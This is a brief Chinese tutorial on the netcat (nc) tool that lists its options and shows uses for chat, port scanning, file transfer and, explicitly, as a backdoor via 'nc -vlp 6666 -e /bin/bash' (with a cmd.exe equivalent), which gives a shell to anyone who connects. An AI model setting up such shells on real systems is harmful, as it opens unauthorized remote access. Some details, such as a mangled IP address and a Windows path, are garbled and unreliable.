netcat又称nc工具,其最主要的作用就是建立连接并返回两个数据流,剩下的就看各位的想象力了,想象力是很重要的,这也是这个工具的强大之处的所在,所以重要的东西才要说三遍,想象力!
具体参数如下:
-d 无命令行界面,使用后台模式-e prog 程序重定向,一旦连接,就执行 [危险!!],(可以理解为向外发送一个东西,对方连上自动执行)-g gateway 源路由跳跃点,不超过8-G num 源路由指示器:4,8,12.。。。。。-h 获取帮助信息-i<延迟秒数> 延时设置,端口扫描时使用-l 监听入站信息-L 监听知道NetCat被结束(可断开重连)- n 以数字形式表示的IP地址,不要使用DNS反向查询IP地址的域名- o<输出文件> 可以将连接上往来传输的数据以16进制的形式记录到logfile中(每行的左半部分是16进制显示,右半部分为ascii显示)。其中,每行的第一个字符为”<”或”>”,分别表示接收的数据或发送的数据。
- p post 打开本地端口- r 随机本地和远程的端口- s addr 本地源地址- t 以TELNET的形式应答入站请求- u 用UDP建立连接- v 显示详细信息[使用-vv获取更信息的信息]- w<超时秒数> 连接超时设置- z I/O模式[扫描时使用],连接成功后立即关闭连接, 不进行数据交换
功能:
1.可以用来聊天。
nc -l -p 6666 监听6666端口,并显示详细信息(-l:监听入站信息)
nc 172.16.150.152 6666 连接172.16.1.150.152的6666端口
2.做后门
nc 的-e参数程序重定向,一 旦连接,就执行 [危险!!],(可以理解为向外发送一个东西,对方连上自动执行)
nc -vlp 6666 -e /bin/bash #监听6666端口,然后把/bin/bash文件发送出去,只要有人连接此端口,对方就执行/bin/bash文件,此文件为linux的shell,windows对应的是nc -e C:WindowsSystem32cmd.exe
直接监听ip 端口就可以反弹得到一个shell
关于nc的一些理解:
当然还可以拿来传输文件、扫描端口nc如果连不上那么就是没有开,反之开放。